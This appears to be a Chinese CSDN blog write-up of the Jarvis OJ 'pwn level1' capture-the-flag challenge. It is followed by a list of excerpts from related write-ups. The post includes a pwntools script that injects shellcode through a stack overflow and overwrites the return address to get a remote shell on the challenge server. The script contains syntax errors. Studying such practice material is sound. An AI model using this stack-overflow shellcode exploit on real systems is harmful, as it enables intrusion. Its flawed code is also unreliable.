jarvisoj pwn level1

最新推荐文章于 2024-02-04 12:10:48 发布

Joey_l

最新推荐文章于 2024-02-04 12:10:48 发布

阅读量446

点赞数

分类专栏： pwn

本文链接：https://blog.csdn.net/Joey_l/article/details/97975815

版权

pwn 专栏收录该内容

3 篇文章 0 订阅

订阅专栏

https://www.jarvisoj.com/challenges

拿到程序后先file可知为32位和动态链接

file level1

然后checksec检查保护机制

checksec level1

拖入ida查看，在vulnerable_function()函数的printf()处存在注入点

栈结构：

低地址→高地址

buf→ebp→eip(返回地址)

思路：没有system函数，在buf插入一段shellcode，将返回地址覆盖为shellcode的地址

level1.py如下：

from pwn import *
io=remote('pwn2.jarvisoj.com',9877)
shellcode=asm(shellcraft.sh())
p=io.recvline()
shell_add=int(p[14,-2],16)
payload=shellcode+'a'*(0x88+0x4=len(shellcode))+p32(shell_add)

io.send(payload)
io.interactive()
io.close()

执行level1.py

python level1.py
ls
cat flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Joey_l

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Jarvis OJ level1

Kni9hT's Blog

11-08

623

要点：使用shellcraft.i386()来编写shellcode 和level0相比，本题没有system函数可以直接调用。所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧，不出意料是全裸) 然后IDA里面看函数调用，main()函数先调用了vulnerable_function函数。 vulnerable_function： text:0804847B ...

(Jarvis Oj)(Pwn) level1

Nothing

04-18

1321

(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开，意味着栈上的数据可执行。用ida反汇编，找到溢出点。但这次没有找到system函数了，那么该怎么得到shell呢，发现这个函数调用了printf函数，输出了buf的地址，在结合NX保护是关闭的，那么就意味着，如果将shellcode写到buf中，函数返回时跳转...

参与评论您还未登录，请先登录后发表或查看评论

PWN_JarvisOJ_Level1

michaelinfinity的博客

03-13

803

首先nc一下之后我们来看ida反编译在“Hello,World!\n”之前有一个vulnerable_function，进去之后查看一下这个函数可以看出来刚刚出现的奇怪的地址是buf的首地址（%p是返回参数地址的），那么我们就要查看一下buf。从中能看出buf有0x88的字节，并且返回指令在+0004的位置，所以需要填充0x88+4的字节这个题目中没有syste...

Jarvis oj level1 wp

ditto的博客

12-30

311

看下防护啥也没开。放IDA里看下：很显然，利用泄露的数组的首地址来写通解，就不用管ASLR了。 exp如下： from pwn import* a=remote(&quot;pwn2.jarvisoj.com&quot;,&quot;9877&quot;) a.recvuntil(&quot;What's this:&quot;) addr=a.recvuntil(&

JarvisOJ-PWN-Level1

杀生丸？不，其实我要的是桔梗

03-16

892

JarvisOJ-PWN-Level 先checksec一下：发现NX栈保护没有打开，也就是堆栈代码没有进行保护，那么就就题目很可能就是要输入shellcode在栈里执行吧。打开IDA分析（32位）：主函数： vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。然后输出Holle world。我们再看b...

jarvisoj pwn level5 wp

zszcr的博客

03-26

1992

题目要求练习 mmap和mprotect 函数不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下：void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...

BUUCTF jarvisoj_level0

m0_54262894的博客

10-27

330

先checksec，仅开启了NX保护运行一下放入ida中查看main函数没有什么关键信息，双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节，而我们可以输入更多的数据接着找找后门函数这道题很简单，已经把后门给我们展示出来了记住后门函数的地址0x400596 做完以上步骤我们就有思路了：覆盖buf 的80个字节因为是64位的文件，然后再加8个字节...

日行一PWN jarvisoj_level0

m0_57221101的博客

05-14

218

还是来自于BUUCTF的机器，今天的很简单，就是单纯的考察了read函数的漏洞，以及对64位寄存器的理解开始首先还是经典查壳和内存保护，发现啥也没有，是很简单的机器。然后IDA反编译一下，由于是64位的软件所以需要IDA64 main函数首先可以看到主函数中知识调用了write函数，并输出了Hello， Worldn这么几个字到终端。之后调用了vulnerable_function函数因为反汇编并不会给出类似于write这种函数的定义，所以需要熟悉汇编的同学自行根据效果来

BUUCTF Pwn jarvisoj_level21解题步骤

最新发布

2301_81505831的博客

02-04

273

这里需要注意的是，由于我们是直接调用system()而不是使用call指令，因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址，因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件，RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88，ebp到Return的距离是0xF。system的地址可以在plt中找到，双击system.plt。然后在输入shift+F12，可以查找。

Jarvis OJ PWN level1

qq_43409582的博客

09-13

264

jarvis oj level1

发蝴蝶和大脑斧的博客

12-01

374

还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行，先看ida，同样是vulnerable处有栈溢...

Jarvis OJ　level1

九层台

07-06

793

liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...

Jarvis OJ 之 level1

weixin_43464124的博客

04-22

289

首先介绍一下pwntools的一个用法吧算是。 from pwn import* shellcraft.sh() 然后，pwntools这个只能工具就会帮你写出一串shellcode来。大致是这样的： u" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push '/bin///sh\\x00' */\n p...

Jarvis OJ-PWN-[XMAN]level1 wp

分不清东西南北的Laffey

09-26

1161

地址：nc pwn2.jarvisoj.com 9877 第一步：用checksec看开启了哪些保护 32位的程序编译时关了栈不可执行保护第二步：用IDA看伪代码进去之后F5看到主函数跟进vulnerable_function()函数第三步：找到溢出点并加以分析我们需要覆盖函数的返回地址将其地址覆盖成shellcode的返回地址这道题不像level0 里面有system函数...

JarvisOJ PWN level1 wp

苗_的博客

01-08

262

level1 checksec看一下保护，几乎没什么保护措施：先拖进IDA里面看一下（f5大法好），发现栈溢出点： f12没发现"/bin/sh"，看一下printf函数会把buf的地址输出出来，我们将它截取，并保存在buf_addr中。由于NX是关闭的状态，也就是说我们把shellcode写进buf里面，函数返回时跳转回buf的位置，就可以执行shellcode了。因此我们把sh...

Jarvis Oj Pwn 学习笔记-level1

baoan4763的博客

05-31

144

32位pwn题目（听说出题人送shellcode？）呈上链接： https://files.cnblogs.com/files/Magpie/level1.rar nc pwn2.jarvisoj.com 9877 先看一下保护：竟然什么都没开......所以... 扔进IDA找到溢出点就可以开始食用了：选中的函数即为存在溢出点的函数：出题人可以说.....

18.9.18 Jarvis OJ PWN----[XMAN]level1

qq_42192672的博客

09-18

234

拖进IDA 这次先是一个vulnerable_function函数，再是一个write函数查看保护机制，发现没有开启，大佬说保护机制没开启，就可以用shellcode啦接下来看函数内部可以看到buf的缓冲区大小为0x100个字节，但是其偏移量是0x88个字节在0x88个字节中首先要留出shellcode的空间（注意这里是32位的）最终返回的地址显然也要返回到shell...

jarvisoj pwn level1 ——记第一次shellcode的编写

Vccxx的博客

03-19

3676

jarvisoj（https://www.jarvisoj.com/challenges ）pwn部分 level1 解题过程：在队友的指导下写了人生第一个shellcode感觉很刺激，过程中还是学到了很多东西，记录一下这个程序流程很简单，用ida分析就两个主要的函数：main：int __cdecl main(int argc, const char **argv, const char **en

jarvisoj_level1

、moddemod

07-06

390

这题我写这个exp是在ubuntu18的环境下写的，远程和本地的IO交互的数据不太一样，下面的exp在远程可以拿到shell，本地可能需要修改一下… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './level1' p = process(proc_name) # p = remote('node3.buuoj.cn', 29850) elf = ELF(proc_na.